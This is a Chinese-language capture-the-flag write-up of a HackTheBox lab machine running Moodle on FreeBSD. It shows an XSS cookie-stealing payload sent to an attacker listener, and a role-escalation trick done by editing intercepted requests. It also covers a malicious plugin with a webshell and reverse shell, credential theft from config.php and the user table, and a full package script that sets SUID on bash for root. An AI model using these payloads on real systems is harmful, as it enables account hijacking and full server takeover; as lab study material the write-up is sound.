一、信息收集
在80端口发现可能存在解析协议,在/etc/hosts中添加域名
果然可以使用这个域名,去访问了一下,没什么发现,于是模糊测试一下
发现了一个moodle的域名,添加进hosts文件
找到一个注册的网页,注册一个新的账号
二、getshell
成功进入系统,之后加入数学的课程,你会得到一些提示,就是老师会检查你的profile里面的某个设置,那么就尝试xss注入,获取老师的cookie值
在里面插入如下的xss语句,并在kali中开启端口监听,获取cookie值
<script>document.location=" http://[IP]:[Port]/cookie= "+document.cookie</script>
成功获取cookie值
以老师的身份登录,moodle cms存在一个越权的漏洞,可以利用它越权到管理员的账号
注册一个新的用户
然后在提交前抓包,并将userlist与roleto的值分别修改为24跟1
然后可以在下面看到一堆账号,选择具有管理员权限的账号点击查看
可以看到如下的图片:
点击log in as ,会得到如下的界面:
接着按照如下的步骤点击
在点击save前抓包,并将内容修改成rce漏洞的payload
接着就可以得到一个install plugins的功能
接下来就可以安装我们的恶意插件了
安装成功并且成功执行了php一句话木马,让我们把里面的php木马文件改成php_reverse_shell并重新上传,成功获取连接
在moodle中有一个mysql的数据凭证文件,去看看
cat /usr/local/www/apache24/data/moodel/config.php
在绝对路径中访问它
找到一个可能有敏感信息的表,select * from mdl_user;
hash值解码,得到账号与密码
成功登录ssh
三、提权
提权主要是利用freebsd的自定义包进行提权
创建一个文件,内容如下:
#!/bin/sh
STAGEDIR=~/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
chmod +s /usr/local/bin/bash
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o
然后执行如下命令,即可提权
总结
声明:hackthebox系列的文章,均是本人根据真实做题经历,并参考国内或国外文章制作而成,如有冒犯之处,请联系我进行修改
290
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
